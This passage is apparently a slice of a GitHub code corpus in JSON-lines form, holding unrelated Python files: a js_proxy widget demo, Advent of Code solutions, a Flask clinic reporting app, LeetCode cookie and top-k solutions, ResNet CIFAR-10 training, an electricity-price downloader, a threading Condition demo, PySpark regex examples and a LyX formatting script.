large_document\n","repo_name":"magnologan/docleaner","sub_path":"api/tests/integration/repository/test_repository.py","file_name":"test_repository.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"29562081477","text":"# First import needed modules and javascript support\n# allow import without install\nimport sys\nif \"..\" not in sys.path:\n sys.path.append(\"..\")\n\nfrom jp_gene_viz import js_proxy\n# this loads the proxy widget javascript \"view\" implementation\njs_proxy.load_javascript_support()\nfrom IPython.display import display\n\n# Then create a \"proxy widget\" for the jQueryUI dialog.\nd = js_proxy.ProxyWidget()\n\n# Construct a command to make the widget into a jQueryUI dialog.\ncommand = d.element().html('Hello from jQueryUI').dialog()\n\n# Send the command to the widget view (javascript side).\nd.send(command)\n\n# Display the widget, which causes the command to also execute.\ndisplay(d)\n\nmake_visible = d.element().dialog()\nd.send(make_visible)\n\nd.results # The results from the last command are not particularly meaningful.\n\n# We want to put the html from the widget in this list\nsave_list = []\n\ndef save_command_result(result):\n \"this is the callback we want to execute when the results arrive\"\n #print (result)\n save_list.append(result)\n\n# This \"action\" gets the html content of the widget.\nget_html = d.element().html()\n\n# Send the action to the javascript side for async execution.\nd.send(get_html, results_callback=save_command_result)\n\n# If we look at save_list now, it will probably be empty because the\n# javascript side has probably not responded yet.\nsave_list\n\n# But later we should see the HTML saved in the list.\nsave_list\n\nresult = d.evaluate(get_html)\n# NOTE: Nothing prints. 
I don't know why.\nprint (result)\n\nprint (result)\n\n# get the DOM element associated with the widget from inside the JQuery container.\nget_dom_element = d.element().get(0)\ndom_element_json = d.evaluate(get_dom_element, level=2)\n\n# Print some info about the JSON for the dom_element sent from Javascript.\nprint(\"got \" + repr(len(dom_element_json)) + \" attributes\")\nfor (i, item) in enumerate(dom_element_json.keys()):\n print(item)\n if i > 10: break\nprint(\"...\")\n\n# Create the widget.\ndp = js_proxy.ProxyWidget()\n\n# Command to populate the widget with an input element with id dp000.\nmake_input = dp.element().html('')._null()\n\n# Command to make the input element into a datepicker and\n# fix the style so the datepicker sits on top of the notebook page.\nfix_style = (\n dp.window().\n jQuery(\"#dp000\"). # get the jQuery input element by id == \"dp\".\n datepicker(). # make it a jQuery UI datepicker.\n css(\"position\", \"relative\").\n css(\"z-index\", \"10000\"). # put it on top\n attr(\"size\", 55). # make it big.\n _null() # we don't care about the command result, discard it.\n )\n\n# Define a python function and data structures to capture\n# values sent to the callback when the datepicker input value changes.\nidentifiers_list = []\narguments_list = []\n\ndef dp_change_handler(identifier, arguments):\n \"Print the results and also store them in lists.\"\n print (identifier, arguments['0']['target']['value'])\n identifiers_list.append(identifier)\n arguments_list.append(arguments)\n \n# Command to create a \"proxy callback\" for the change event.\n# The proxy will translate values to JSON up to 3 levels deep\n# and also send the identifier data \"dp has changed\" to the handler.\nproxy_callback = dp.callback(dp_change_handler, data=\"dp has changed\", level=3)\n\n# Command to associate the proxy callback with the datepicker change event\n# using the standard $(x).change(callback) jQuery method.\non_change_command = dp.window().jQuery(\"#dp000\").change(proxy_callback)\n\n# Send the commands to the Javascript view.\ndp.send_commands([make_input, fix_style, on_change_command])\n\n# display the widget\ndisplay(dp)\n\ndocument = dp.window().document\nnew_input = document.createElement(\"input\")\nsave_input = dp.element()._set(\"saved_input\", new_input)\njson_sent = dp.send(save_input)\n\n# what is the type of the new input element?\nelement_type = dp.evaluate(dp.element().saved_input.type)\n\n# apparently the default type for an input element is \"text\"\nelement_type\n\nnew = dp.element().New\nklass = dp.window().Function\n# from https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function\n# emulate \"new Function('a', 'b', 'return a + b')\"\nadd_function = new(klass, [\"a\", \"b\", \"return a + b;\"])\nsave_function = dp.element()._set(\"my_function\", add_function)\njson_sent = dp.send(save_function)\n\nfunction_evaluation = dp.evaluate(dp.element().my_function(34, 6))\n\nfunction_evaluation\n\nwindow = dp.window()\nih = dp(window.innerWidth)\ndp(window.innerHeight)\ndp(ih)\njson_sent = dp.flush()\n\ndp.results\n\nnew_element_reference = dp.save(\"another_element\", document.createElement(\"input\"))\njson_sent = dp.flush()\nother_element_type = dp.evaluate(new_element_reference.type)\n\nother_element_type\n\nfunction_reference = dp.save_new(\"another_function\", klass, [\"a\", \"b\", \"return a * b;\"])\njson_sent = dp.flush()\nproduct = dp.evaluate(function_reference(5, 2.2))\n\nproduct\n\ndivision = dp.function([\"a\", \"b\"], \"return a 
/ b;\")\ntenth = dp.evaluate(division(1.0, 10.0))\n\ntenth\n\njs_div_mod = dp.save_function(\"div_mod\", [\"a\", \"b\"], \"return {div: Math.trunc(a / b), mod: a % b};\")\ndp.flush()\nd_23_10 = dp.evaluate(js_div_mod(23, 10))\n\n# call the function using the returned reference\nd_23_10\n\n# call the function explicitly via the element namespace.\nd_467_45 = dp.evaluate(dp.element().div_mod(467, 45))\n\nd_467_45\n\njson_sent = dp.send(dp.function([\"element\"], \"debugger;\")(dp.element()))\n\ndp.js_debug()\n\n\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/js_proxy example.py","file_name":"js_proxy example.py","file_ext":"py","file_size_in_byte":5466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"347613451","text":"import re\n\nclass Monkey:\n currentItems = []\n operation = \"\"\n nextIfTrue = 0\n nextIfFalse = 0\n id = 0\n inspected = 0\n test = 0\n def __init__(self, startingItems, operation, id, nextIfTrue, nextIfFalse, test) -> None:\n self.currentItems = startingItems\n self.operation = operation\n self.id = id\n self.nextIfFalse = nextIfFalse\n self.nextIfTrue = nextIfTrue\n self.test = test\n\ncurrentMonkeyId = 0\nstartList = []\noperation = \"\"\ntest = 0\nnextIfFalse = 0\nnextIfTrue = 0\nmonkeys=[]\nmodulo = 1\n\nwith open(\"jour11Input.txt\") as lines:\n for line in lines:\n line = line.strip()\n match = re.match(\"Monkey ([0-9]):\", line)\n if match:\n currentMonkeyId = int(match[1])\n continue\n match = re.match(\"Starting items:\", line)\n if match:\n startList = line[16:].split(\",\")\n for i in range(len(startList)):\n startList[i] = int(startList[i])\n continue\n match = re.match(\"Operation:\", line)\n if match:\n operation = line[11:]\n # print(operation)\n # loc = {}\n # old=1\n # new = 0\n # exec(operation, globals(), loc)\n # print(loc[\"new\"])\n continue\n match = re.match(\"Test: divisible by ([0-9]*)\", line)\n if match:\n test = int(match[1])\n modulo *= test\n continue\n match = re.match(\"If true: throw to monkey ([0-9])\", line)\n if match:\n nextIfTrue = int(match[1])\n continue\n match = re.match(\"If false: throw to monkey ([0-9])\", line)\n if match:\n nextIfFalse = int(match[1])\n continue\n monkeys.append(Monkey(startList, operation, currentMonkeyId, nextIfTrue, nextIfFalse, test))\n\nfor round in range(10000):\n print(\"Round :\",round)\n # for monkey in monkeys:\n # print(monkey.id, monkey.currentItems)\n for monkey in monkeys:\n for item in monkey.currentItems:\n monkey.inspected += 1\n old = item\n new = 0\n loc={}\n exec(monkey.operation, globals(), loc)\n new = loc[\"new\"]\n # new = new // 3\n new = new % modulo\n if (new % monkey.test == 0):\n monkeys[monkey.nextIfTrue].currentItems.append(new)\n else:\n monkeys[monkey.nextIfFalse].currentItems.append(new)\n monkey.currentItems = []\n\nfor monkey in monkeys:\n print(monkey.inspected)","repo_name":"Sarth69/AdventOfCode2022","sub_path":"jour11.py","file_name":"jour11.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34053515207","text":"#/usr/bin/env python\n#coding=utf-8\n\nfrom MatchSRNN_Model import *\n\n\nmodel_matchsrnn = MyMactchSRNN(x1_max_length=75,\n x2_max_length=90,\n vocab_size=13407,\n embedding_size=125,\n class_nums=2,\n 
learning_rate=1e-3)","repo_name":"BJUT2016SoftJunLu/Financial_Intelligent_NLP_Service","sub_path":"MatchSRNN/code/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"41436368245","text":"from flask import Flask, request, render_template\r\nfrom flask_cors import cross_origin\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport pandas as pd\r\nimport pyodbc\r\n\r\n\r\n#connection to database\r\nconn = pyodbc.connect('Driver={SQL Server};'\r\n 'Server=DESKTOP-H2PDBDI\\MSSQLSERVER01;'\r\n 'Database=Clinic;'\r\n 'Trusted_Connection=yes;');\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/\")\r\n@cross_origin()\r\ndef home():\r\n return render_template(\"index.html\")\r\n\r\n@app.route(\"/datareport\", methods = [\"GET\", \"POST\"])\r\n@cross_origin()\r\ndef data():\r\n option = request.form['exampleRadios']\r\n if option == 'option1':\r\n data = pd.read_sql(\"SELECT * FROM INPatient\", conn)\r\n result=data.to_html()\r\n sns.barplot(x='INPatient_No',y='INPatient_Age',data=data)\r\n plt.xlabel('Patient Id')\r\n plt.ylabel('Age')\r\n plt.title('INPatient ID\\'s with their Age')\r\n plt.savefig('static/INPatient1.jpg')\r\n\r\n sns.kdeplot(data=data['INPatient_Age'])\r\n plt.xlabel('INPatient Age')\r\n plt.title('Age Seperation')\r\n plt.savefig('static/INPatient2.jpg')\r\n result=append_html(result,['INPatient1.jpg','INPatient2.jpg'])\r\n\r\n \r\n\r\n elif option == 'option2':\r\n data = pd.read_sql(\"SELECT * FROM Doctor\", conn)\r\n \r\n result=data.to_html()\r\n sns.barplot(x='Doctor_Fname',y='Doctor_Consultation_Fee',data=data)\r\n plt.xlabel('Doctor Name')\r\n plt.ylabel('Consultation Fee')\r\n plt.title('Doctor with their Consultation Fee')\r\n plt.savefig('static/doc1.jpg')\r\n\r\n sns.barplot(x='Doctor_Fname',y='Doctor_Age',data=data)\r\n plt.xlabel('Doctor Name')\r\n plt.ylabel('Age')\r\n plt.title('Doctor with their Age')\r\n plt.savefig('static/doc2.png')\r\n result=append_html(result,['doc1.jpg','doc2.png'])\r\n elif option == 'option3':\r\n data = pd.read_sql(\"SELECT * FROM Bill\", conn)\r\n result=data.to_html()\r\n sns.barplot(x='INPatient_No',y='Total_Cost',data=data)\r\n plt.xlabel('Patient Number')\r\n plt.ylabel('Total Cost')\r\n plt.title('Patient Number with their Total Cost')\r\n plt.savefig('static/bill1.jpg')\r\n\r\n sns.barplot(x='Bill_Date',y='Total_Cost',data=data)\r\n plt.xlabel('Date')\r\n plt.ylabel('Cost')\r\n plt.title('Bill Date with their total Cost')\r\n plt.savefig('static/bill2.png')\r\n result=append_html(result,['Bill1.jpg','Bill2.jpg'])\r\n\r\n\r\n elif option == 'option4':\r\n data = pd.read_sql(\"SELECT * FROM Checkup\", conn)\r\n result=data.to_html()\r\n \r\n\r\n elif option == 'option5':\r\n data = pd.read_sql(\"SELECT * FROM OUTPatient\", conn)\r\n result=data.to_html()\r\n sns.barplot(x='OUTPatient_No',y='OUTPatient_Age',data=data)\r\n plt.xlabel('Patient Id')\r\n plt.ylabel('Age')\r\n plt.title('OUTPatient ID\\'s with their Age')\r\n plt.savefig('static/OUTPatient1.jpg')\r\n\r\n sns.kdeplot(data=data['OUTPatient_Age'])\r\n plt.xlabel('OUTPatient Age')\r\n plt.title('Age Seperation')\r\n plt.savefig('static/OUTPatient2.jpg')\r\n result=append_html(result,['OUTPatient1.jpg','OUTPatient2.jpg'])\r\n\r\n \r\n return result\r\n\r\n\r\ndef append_html(result,image_names):\r\n for i in image_names:\r\n result=result+\" \"\r\n return result\r\n\r\n\r\nif __name__ == \"__main__\":\r\n 
app.run(debug=True)\r\n","repo_name":"ahasanasultana/Clinic_Management_System","sub_path":"2048025/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72441732912","text":"from typing import List\nimport bisect\n\nclass Solution:\n \"\"\"\n 접근방법\n \n 아이들에게 나누어 줄 수 있는 쿠키의 수를 최대로 하기 위해서 크기가 작은 쿠키를\n greedy factor가 작은 아이에게 먼저 나누어주는 방법을 선택\n \n 따라서 쿠키와 아이들을 모두 오름차순으로 정렬 후\n cookie를 iterate하며 현재 쿠키 사이즈가 greedy factor를 만족하면 결과변수 증가,\n 아니면 다음 쿠키로 넘어가는 방식으로 문제를 풀이하였다.\n \n 그리디 알고리즘으로 분류한 이유는 현재의 상황에서 가장 작은 쿠키를 나누어주고 이후의 상황은 \n 상관하지 않기에 그리디 알고리즘으로 분류했다고 생각한다.\n \"\"\"\n # 두 리스트를 모두 오름차순으로 정렬한 후 \n # 쿠키의 크기가 작은 \n def findContentChildren(self, g: List[int], s: List[int]) -> int:\n # 결과 변수\n count = index = 0\n n = len(g)\n \n # 정렬\n g.sort()\n s.sort()\n \n for cookie in s:\n if cookie >= g[index]:\n count += 1\n index += 1\n \n if index > n - 1:\n break\n \n return count\n \n # 책의 그리디 알고리즘 풀이\n def findContentChildren(self, g: List[int], s: List[int]) -> int:\n g.sort()\n s.sort()\n \n child_i = cookie_j = 0\n # 만족하지 못할 때까지 그리디 진행\n while child_i < len(g) and cookie_j < len(s):\n if s[cookie_j] >= g[child_i]:\n child_i += 1\n cookie_j += 1\n \n return child_i\n \n # 책의 이진 검색 풀이\n def findContentChildren(self, g: List[int], s: List[int]) -> int:\n g.sort()\n s.sort()\n \n result = 0\n for i in s:\n # 이진 검색으로 더 큰 인덱스 탐색\n index = bisect.bisect_right(g, i)\n if index > result:\n result += 1\n \n return result\n \ng = [1,2]\ns = [1,2,3]\nsolution = Solution()\nprint(solution.findContentChildren(g, s))","repo_name":"dhtmaks2540/LeetCode-Algorithm","sub_path":"algorithm_problems/assign-cookies-2.py","file_name":"assign-cookies-2.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"42896344068","text":"from typing import List\n\n\nclass Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n counter = {}\n for x in nums:\n if x not in counter:\n counter[x] = 1\n else:\n counter[x] += 1\n\n min_count = 0\n min_index = 0\n top_list = []\n for val, count in counter.items():\n if len(top_list) < k:\n if min_count > count or min_count == 0:\n min_count = count\n min_index = len(top_list)\n top_list.append((val, count, len(top_list)))\n else:\n if count > min_count:\n top_list[min_index] = (val, count, min_index)\n _, min_count, min_index, = min(top_list, key=lambda q: q[1])\n result = []\n for val, _, _ in top_list:\n result.append(val)\n return result\n\n\ns = Solution()\nprint(s.topKFrequent([4, 1, -1, 2, -1, 2, 3], 2))\n","repo_name":"z17/leetcode-solutions","sub_path":"tasks/top-k-frequent-elements.py","file_name":"top-k-frequent-elements.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15355648001","text":"# resnet_cifar10_decay.py\n\nimport matplotlib\nmatplotlib.use(\"Agg\")\n\nimport os\nimport sys\nimport argparse\nimport numpy as np\nimport keras.backend as K\nfrom keras.models import load_model\nfrom keras.datasets import cifar10\nfrom keras.optimizers import SGD\nfrom keras.callbacks import LearningRateScheduler\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom pyimagesearch.callbacks import TrainingMonitor\nfrom pyimagesearch.callbacks import EpochCheckpoint\nfrom pyimagesearch.nn.conv import ResNet\nfrom sklearn.preprocessing 
import LabelBinarizer\n\nsys.setrecursionlimit(5000)\n\n\nNUM_EPOCHS = 100\nINIT_LR = 1e-1\n\ndef poly_decay(epoch):\n    # initialize the maximum number of epochs, base learning\n    # rate and power of the polynomial\n    maxEpochs = NUM_EPOCHS\n    baseLR = INIT_LR\n    power = 1.0\n\n    # compute the new learning rate based on polynomial decay\n    alpha = baseLR * (1 - (epoch / float(maxEpochs))) ** power\n\n    # return the new learning rate\n    return alpha\n\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-m\",\"--model\", required = True,\n    help = \"path to output model\")\nap.add_argument(\"-o\", \"--output\", required = True,\n    help = \"path to output directory (logs, plots, etc.)\")\nargs = vars(ap.parse_args())\n\n# load the training and testing data, converting the images\n# from integers to floats\nprint(\"[INFO] loading CIFAR-10 data...\")\n((trainX, trainY), (testX, testY)) = cifar10.load_data()\ntrainX = trainX.astype(\"float\")\ntestX = testX.astype(\"float\")\n\n# apply mean subtraction to the data\nmean = np.mean(trainX, axis = 0)\ntrainX -= mean\ntestX -= mean\n\n# convert the labels from integers to vectors\nlb = LabelBinarizer()\ntrainY = lb.fit_transform(trainY)\ntestY = lb.transform(testY)\n\naugmentation = ImageDataGenerator(\n    width_shift_range = 0.1,\n    height_shift_range = 0.1, horizontal_flip = True,\n    fill_mode = \"nearest\"\n)\n\n# construct the set of callbacks\nfigPath = os.path.sep.join(\n    [args[\"output\"], f\"{os.getpid()}.png\"]\n)\n\njsonPath = os.path.sep.join(\n    [args[\"output\"], f\"{os.getpid()}.json\"]\n)\n\ncallbacks = [\n    TrainingMonitor(\n        figPath, jsonPath = jsonPath\n    ),\n    LearningRateScheduler(\n        poly_decay\n    )\n]\n\n# initialize the optimizer and model (ResNet-56)\nprint(\"[INFO] compiling model...\")\noptimizer = SGD(lr = INIT_LR, momentum = 0.9)\n\nmodel = ResNet.build(\n    width = 32, height = 32, depth = 3,\n    classes = 10, stages = (9, 9, 9),\n    filters = (64, 64, 128, 256),\n    reg = 0.0005\n)\n\nmodel.compile(\n    loss = \"categorical_crossentropy\",\n    optimizer = optimizer,\n    metrics = [\"accuracy\"]\n)\n\n# train the network\nprint(\"[INFO] training network...\")\nmodel.fit_generator(\n    augmentation.flow(\n        trainX, trainY, batch_size = 128\n    ),\n    validation_data = (testX, testY),\n    steps_per_epoch = len(trainX) // 128,\n    epochs = 10,\n    callbacks = callbacks,\n    verbose = 1\n)\n\n# save the network to disk\nprint(\"[INFO] serializing network...\")\nmodel.save(args[\"model\"])","repo_name":"positronn/DL4CV2","sub_path":"examples/resnet_cifar10_decay.py","file_name":"resnet_cifar10_decay.py","file_ext":"py","file_size_in_byte":3016,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"38"}
+{"seq_id":"8824868692","text":"\"\"\"\nIn this approach we are using a `list comprehension` approach to filter data\nbased on certain criteria. 
Intuitively this should be slower than the\n`vector` method.\n\nWe want to profile it for different datasets.\n\"\"\"\n\nfrom __future__ import print_function\n\nimport time\nimport cProfile\nimport pstats\nfrom io import StringIO\n\nimport pandas as pd\n\nfrom read_sql_data import get_hist_data_as_dataframes_dict\nfrom tickerplot.sql.sqlalchemy_wrapper import get_metadata\n\ndef panel_bench_lc(panel):\n sels = [panel[x]['close'][-1] > panel[x]['close'][-2] \\\n for x in panel]\n return sels\n\ndef panel_bench_vector(panel):\n\n pan2 = panel.transpose(2, 0, 1)\n cl = pan2['close']\n cl2 = cl[cl.iloc[:, -1] > cl.iloc[:, -2]]\n pan11 = panel[cl2.index]\n\n return pan11.items\n\nclass ProcessPandasPanelBench(object):\n\n def __init__(self, method='cProfile', limit_rows=0, db_path=None):\n self.db_path = db_path\n self.method_name = method\n self.limit_rows = limit_rows\n self.metadata = get_metadata(self.db_path)\n\n def set_method(self, method_name='cProfile'):\n if method_name not in ('cprofile', ):\n raise ValueError(\"Method name should be 'cProfile'\")\n self.method_name = method_name\n\n def run_bench_cprofile(self, panel):\n\n # FIXME: Add a Contextanager Class\n then0 = time.time()\n pr = cProfile.Profile()\n pr.enable()\n\n selectors = panel_bench_lc(panel=panel)\n\n pr.disable()\n s = StringIO()\n sort_by = 'cumulative'\n ps = pstats.Stats(pr, stream=s).sort_stats(sort_by)\n ps.print_stats(0.1)\n\n now0 = time.time()\n\n print(self.limit_rows, now0 - then0)\n print(len(selectors))\n print(s.getvalue())\n\n # FIXME: Add a Contextanager Class\n then0 = time.time()\n pr = cProfile.Profile()\n pr.enable()\n\n selectors = panel_bench_vector(panel=panel)\n\n pr.disable()\n s = StringIO()\n sort_by = 'cumulative'\n ps = pstats.Stats(pr, stream=s).sort_stats(sort_by)\n ps.print_stats(0.1)\n\n now0 = time.time()\n\n print (self.limit_rows, now0 - then0)\n print (len(selectors))\n print(s.getvalue())\n\n def run_bench(self):\n\n # setup - common\n scripdata_dict = get_hist_data_as_dataframes_dict(\n metadata=self.metadata,\n limit=self.limit_rows)\n panel = pd.Panel(scripdata_dict)\n\n print(panel)\n self.run_bench_cprofile(panel)\n\n\nif __name__ == '__main__':\n #bench = ProcessPandasPanelBench(db_path='sqlite:///nse_hist_data_test2.sqlite3',\n # limit_rows=0)\n #bench.run_bench()\n print (\"*\" * 80)\n limit = 20\n while limit <= 4000:\n bench2 = ProcessPandasPanelBench(db_path='sqlite:///nse_hist_data.sqlite3',\n limit_rows=limit)\n bench2.run_bench()\n limit *= 2\n","repo_name":"hyphenOs/tickdownload","sub_path":"process_pd_panel_bench.py","file_name":"process_pd_panel_bench.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"38"} +{"seq_id":"17105928719","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\nimport xmltodict\nimport requests\nfrom datetime import timedelta, date\nimport time\n\ndef daterange(start_date, end_date):\n for n in range(int ((end_date - start_date).days)):\n yield start_date + timedelta(n)\n \nstart_date = date(2016, 9, 1)\nend_date = date(2017, 9, 2)\n\nprecio1 = {}\nfor i in range(0, 25):\n precio1[i] = 0.0\nprecio2 = {}\nfor i in range(0, 25):\n precio2[i] = 0.0\ncantidad = 0\n\nfor single_date in daterange(start_date, end_date):\n d = single_date.strftime(\"%d-%m-%Y\")\n r = requests.get(\"https://api.esios.ree.es/archives/80/download?date=\" + d)\n print(d)\n time.sleep(0.2)\n doc = xmltodict.parse(r.text)\n for tarifa in 
doc['PVPCDesgloseHorario']['SeriesTemporales']:\n if 'TipoPrecio' in tarifa and 'TerminoCosteHorario' in tarifa and tarifa['TipoPrecio']['@v'] == \"Z01\" and tarifa['TerminoCosteHorario']['@v'] ==\"FEU\":\n n = 0\n cantidad += 1\n for i in tarifa['Periodo']['Intervalo']:\n precio1[n] += float(i['Ctd']['@v'])\n n += 1\n if 'TipoPrecio' in tarifa and 'TerminoCosteHorario' in tarifa and tarifa['TipoPrecio']['@v'] == \"Z02\" and tarifa['TerminoCosteHorario']['@v'] ==\"FEU\":\n n = 0\n cantidad += 1\n for i in tarifa['Periodo']['Intervalo']:\n precio2[n] += float(i['Ctd']['@v'])\n n += 1\n \nprint(precio1)\nprint(precio2)\nprint(cantidad)\n","repo_name":"4m1g0/downloadEnergyPricesPeriod","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"36725376531","text":"import time\nimport threading\n\n\ndef consumer(cond):\n t = threading.current_thread()\n with cond:\n cond.wait() # wait()方法创建了一个名为waiter的锁,并且设置锁的状态为locked。这个waiter锁用于线程间的通讯\n # time.sleep(2)\n print('{}: Resource is available to consumer'.format(t.name))\n\n\ndef producer(cond):\n t = threading.current_thread()\n with cond:\n print('{}: Making resource available'.format(t.name))\n # cond.acquire()\n cond.notifyAll() # 释放waiter锁,唤醒消费者\n # time.sleep(5)\n # cond.release()\n\n\ncondition = threading.Condition()\n\nc1 = threading.Thread(name='c1', target=consumer, args=(condition,))\nc2 = threading.Thread(name='c2', target=consumer, args=(condition,))\np = threading.Thread(name='p', target=producer, args=(condition,))\n\nc2.start()\ntime.sleep(1)\nc1.start()\ntime.sleep(1)\np.start()\n","repo_name":"eason-shsf/producer-consumer","sub_path":"src_behavior/bark/dongwm/dwmCondition.py","file_name":"dwmCondition.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"29024804997","text":"#!/usr/bin/env/python3\n\ndef inverse(instruction):\n return 'nop' if instruction == 'jmp' else 'jmp'\n\ndef main():\n with open('day08.txt') as f:\n program = []\n i = 0\n for l in f:\n program.append((i, l[0:3], int(l[4:])))\n i += 1\n\n acc1 = 0\n done = []\n operation = program[0]\n while 1:\n if operation in done:\n break\n\n done.append(operation)\n index = operation[0]\n instruction = operation[1]\n value = operation[2]\n\n if 'acc' in instruction:\n acc1 += value\n index += 1\n elif 'jmp' in instruction:\n index += value\n else:\n index += 1\n\n operation = program[index]\n\n print(acc1)\n\n\n acc2 = 0\n done = []\n tested = []\n operation = program[0]\n testing = False\n while 1:\n if operation in done:\n operation = program[0]\n done = []\n acc2 = 0\n testing = False\n\n done.append(operation)\n index = operation[0]\n instruction = operation[1]\n value = operation[2]\n\n if not testing and (instruction == 'jmp' or instruction == 'nop') and not operation in tested:\n tested.append(operation)\n instruction = inverse(instruction)\n testing = True\n\n if instruction == 'acc':\n acc2 += value\n index += 1\n elif instruction == 'jmp':\n index += value\n else:\n index += 1\n\n if index == len(program):\n break\n\n operation = program[index]\n\n print(acc2)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zarov/AdventOfCode2020","sub_path":"day08.py","file_name":"day08.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} 
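The `dwmCondition.py` record above depends on its `time.sleep` calls to make sure both consumers are already blocked in `cond.wait()` before the producer fires `notifyAll()`; a notification that arrives while nobody is waiting is simply lost, so a late consumer would block forever. A minimal sketch of the more robust shape uses a shared predicate plus `wait_for`, which re-checks the flag on every wakeup (the `resource_ready` flag and the `join` scaffolding are additions for illustration, not part of the original file):

```python
import threading

resource_ready = False          # shared state, guarded by the condition's lock
condition = threading.Condition()

def consumer(cond):
    t = threading.current_thread()
    with cond:
        # Returns immediately if the producer has already run; otherwise
        # waits and re-tests the predicate after every notification.
        cond.wait_for(lambda: resource_ready)
        print('{}: Resource is available to consumer'.format(t.name))

def producer(cond):
    global resource_ready
    with cond:
        print('{}: Making resource available'.format(threading.current_thread().name))
        resource_ready = True   # record the state change first...
        cond.notify_all()       # ...then wake every waiting consumer

threads = [threading.Thread(name=name, target=fn, args=(condition,))
           for name, fn in (('c1', consumer), ('c2', consumer), ('p', producer))]
for th in threads:
    th.start()
for th in threads:
    th.join()
```

Because each waiter tests shared state rather than relying on wakeup order, this version works even if `p` is started before `c1` and `c2`.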
+{"seq_id":"44636817268","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import regexp_replace,col,translate,regexp_extract,instr\nspark = SparkSession.builder.appName(\"Pyspark example\").getOrCreate()\n\ndf= spark.read.format(\"csv\").option(\"header\",\"true\").option(\"inferSchema\",\"true\").load(\"C:/Users/Lenovo/Desktop/spark_data/retail_store.csv\")\n#'regexp_replace' is used to replace substitute color names with NOCOLOR\nstr1=\"BLACK|WHITE|RED|BLUE|GREEN\"\ndf.select(regexp_replace(col(\"Description\"),str1,\"NOCOLOR\").alias(\"no_color_column\"),col(\"Description\")).show(5)\n\n#'translate' function is to replace given characters with other characters\ndf.select(translate(col(\"Description\"),\"ABCD\",\"1234\"),col(\"Description\")).show(5)\n\n#'regexp_extract' is used to extract values\ndf.select(regexp_extract(col(\"Description\"),str1,0).alias(\"color\"),col(\"Description\")).show(5)\n\n#'instr' function checks for the existance of a value\ncontainsRed= instr(col(\"Description\"),\"RED\")>=1\ncontainsWhite= instr(col(\"Description\"),\"WHITE\")>=1\ndf.withColumn(\"hasColor\",containsWhite| containsRed).where(\"hasColor\").select(\"Description\").show(5)","repo_name":"Sushmitha2708/Spark","sub_path":"Python/Spark Data Types/StringsWithRegularExpressions.py","file_name":"StringsWithRegularExpressions.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"32925738017","text":"import os\r\ndef Diff(li1, li2):\r\n return (list(list(set(li1)-set(li2)) + list(set(li2)-set(li1))))\r\n\r\n\r\nwidth_percent=input(\"Choose width as % of page: \")\r\noverride_current=input(\"Would you like to over-ride current formatting? reply with Y or N \")\r\ntrim_path=input(\"Would you like to trim images full path? 
reply with Y or N \")\r\npath_to_file=input(\"Paste path to your .lyx file here: \")\r\n\r\nf = open(path_to_file, \"r\")\r\n\r\ncontents = f.readlines()\r\nf.close()\r\n\r\nlyx_filename_path, lyx_filename_tail=os.path.split(path_to_file)\r\ncurr_dir = os.listdir(os.getcwd())\r\n\r\nif path_to_file.endswith('.lyx'):\r\n\r\n for num, line in enumerate(contents, 1):\r\n\r\n #for line in contents:\r\n if \"filename\" in line:\r\n # this is the graphic's line\r\n # trim path of object if it is in the same dir\r\n if trim_path==\"Y\":\r\n words_of_line=line.split(\" \")\r\n for index,word in enumerate(line,1):\r\n if word==\"filename\":\r\n #check if it's long path or not\r\n if str(curr_dir) in words_of_line[index+1]:\r\n obj_path= words_of_line[index+1]\r\n head, tail = os.path.split(obj_path)\r\n #change full path to filename only, assuming it is in the same folder!!\r\n words_of_line[index+1]=tail\r\n\r\n if override_current==\"N\":\r\n if \"width\" not in contents[num+1]:\r\n # means it is NOT already formatted\r\n print(contents[num])\r\n contents.insert(num, \"\twidth {}page%\\n\".format(width_percent))\r\n # else:\r\n # # add comment to show you have been there\r\n # contents[num+1]=\"% SKIPPED\twidth {}page%\\n\".format(width_percent)\r\n\r\n # OVER RIDING EXISTING FORMATTING\r\n else:\r\n if \"width\" in contents[num+1]:\r\n # means it is not already formatted\r\n contents.insert(num, \"\twidth {}page%\\n\".format(width_percent))\r\n else:\r\n # replace current with new settings\r\n contents[num]=\"\twidth {}page%\\n\".format(width_percent)\r\n\r\nelse:\r\n print(\"It 